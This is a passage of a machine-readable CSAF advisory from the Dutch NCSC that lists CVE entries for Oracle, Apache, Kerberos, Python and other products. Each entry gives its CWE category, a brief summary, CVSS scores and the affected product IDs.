"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2024-12133"
},
{
"cve": "CVE-2024-28182",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "other",
"text": "Detection of Error Condition Without Action",
"title": "CWE-390"
},
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "description",
"text": "Multiple vulnerabilities across Oracle MySQL, Oracle Communications, and nghttp2 products allow remote attackers to exploit confidentiality, integrity, and availability, with varying damage ratings from medium to high.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-28182 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-28182.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2024-28182"
},
{
"cve": "CVE-2024-35164",
"cwe": {
"id": "CWE-129",
"name": "Improper Validation of Array Index"
},
"notes": [
{
"category": "other",
"text": "Improper Validation of Array Index",
"title": "CWE-129"
},
{
"category": "description",
"text": "Recent vulnerabilities in Oracle Communications Unified Assurance and Apache Guacamole could allow high-privileged attackers to compromise systems and execute arbitrary code, respectively.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-35164 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-35164.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2024-35164"
},
{
"cve": "CVE-2024-37371",
"cwe": {
"id": "CWE-130",
"name": "Improper Handling of Length Parameter Inconsistency"
},
"notes": [
{
"category": "other",
"text": "Improper Handling of Length Parameter Inconsistency",
"title": "CWE-130"
},
{
"category": "other",
"text": "Out-of-bounds Read",
"title": "CWE-125"
},
{
"category": "description",
"text": "Multiple vulnerabilities across Oracle products, including Communications and MySQL, as well as MIT Kerberos 5, allow for unauthorized access, denial of service, and other malicious activities, with CVSS scores reaching 9.1.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-37371 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-37371.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2024-37371"
},
{
"cve": "CVE-2024-47554",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "description",
"text": "Multiple vulnerabilities across Oracle Middleware, Documaker, and Apache Commons IO components allow unauthenticated attackers to exploit denial of service risks, with CVSS scores ranging from 4.3 to 7.5.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-47554 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-47554.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2024-47554"
},
{
"cve": "CVE-2024-50609",
"cwe": {
"id": "CWE-476",
"name": "NULL Pointer Dereference"
},
"notes": [
{
"category": "other",
"text": "NULL Pointer Dereference",
"title": "CWE-476"
},
{
"category": "description",
"text": "Fluent Bit 3.1.9 has a vulnerability allowing remote Denial of Service attacks via a zero-length packet, while Oracle Communications Unified Assurance versions 6.1.0-6.1.1 can be exploited by high-privileged attackers for complete Denial of Service.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-50609 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-50609.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2024-50609"
},
{
"cve": "CVE-2024-51504",
"cwe": {
"id": "CWE-290",
"name": "Authentication Bypass by Spoofing"
},
"notes": [
{
"category": "other",
"text": "Authentication Bypass by Spoofing",
"title": "CWE-290"
},
{
"category": "description",
"text": "Recent vulnerabilities in Apache ZooKeeper and Oracle Communications Unified Assurance expose systems to authentication bypass and unauthorized access, allowing attackers to execute commands and access critical data.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-51504 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-51504.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2024-51504"
},
{
"cve": "CVE-2024-57699",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Recursion",
"title": "CWE-674"
},
{
"category": "description",
"text": "Multiple security vulnerabilities across various Oracle products and the Netplex Json-smart library can lead to Denial of Service (DoS) due to stack exhaustion and other exploits, affecting versions 2.5.0 to 2.5.1 and specific Oracle software.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-57699 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-57699.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2024-57699"
},
{
"cve": "CVE-2025-1948",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "description",
"text": "Eclipse Jetty versions 12.0.0 to 12.0.16 are vulnerable to OutOfMemoryError and denial of service attacks due to improper validation of the SETTINGS_MAX_HEADER_LIST_SIZE parameter, affecting various products including Oracle Communications EAGLE and NetApp.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-1948 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-1948.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-1948"
},
{
"cve": "CVE-2025-3576",
"cwe": {
"id": "CWE-328",
"name": "Use of Weak Hash"
},
"notes": [
{
"category": "other",
"text": "Use of Weak Hash",
"title": "CWE-328"
},
{
"category": "description",
"text": "Recent vulnerabilities in krb5 and MIT Kerberos implementations allow for message spoofing via MD5 checksum weaknesses, while Oracle Communications Network Analytics Data Director is susceptible to unauthorized data manipulation through SSH access.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-3576 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-3576.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-3576"
},
{
"cve": "CVE-2025-4373",
"cwe": {
"id": "CWE-124",
"name": "Buffer Underwrite (\u0027Buffer Underflow\u0027)"
},
"notes": [
{
"category": "other",
"text": "Buffer Underwrite (\u0027Buffer Underflow\u0027)",
"title": "CWE-124"
},
{
"category": "description",
"text": "Recent vulnerabilities in Oracle Communications Cloud Native Core and glib2 involve unauthorized access risks and buffer overflow issues, affecting multiple products with varying severity levels.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-4373 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-4373.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L/E:U",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-4373"
},
{
"cve": "CVE-2025-4517",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"title": "CWE-22"
},
{
"category": "description",
"text": "Recent updates to Python versions 3.6 through 3.13.5 address multiple security vulnerabilities, particularly in the tarfile module, while enhancing various functionalities and resolving issues related to memory management and IPv6 handling.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-4517 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-4517.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.4,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36"
]
}
],
"title": "CVE-2025-4517"
},
{
"cve": "CVE-2025-4802",
"cwe": {
"id": "CWE-426",
"name": "Untrusted Search Path"
},
"notes": [
{
"category": "other",
"text": "Untrusted Search Path",
"title": "CWE-426"
},
{
"category": "description",
"text": "Vulnerabilities in Oracle Communications Cloud Native Core and glibc allow unauthenticated access and privilege escalation, with CVSS scores of 7.8, affecting confidentiality, integrity, and availability.",
"title": "Summary"
},
{
"category": "general",
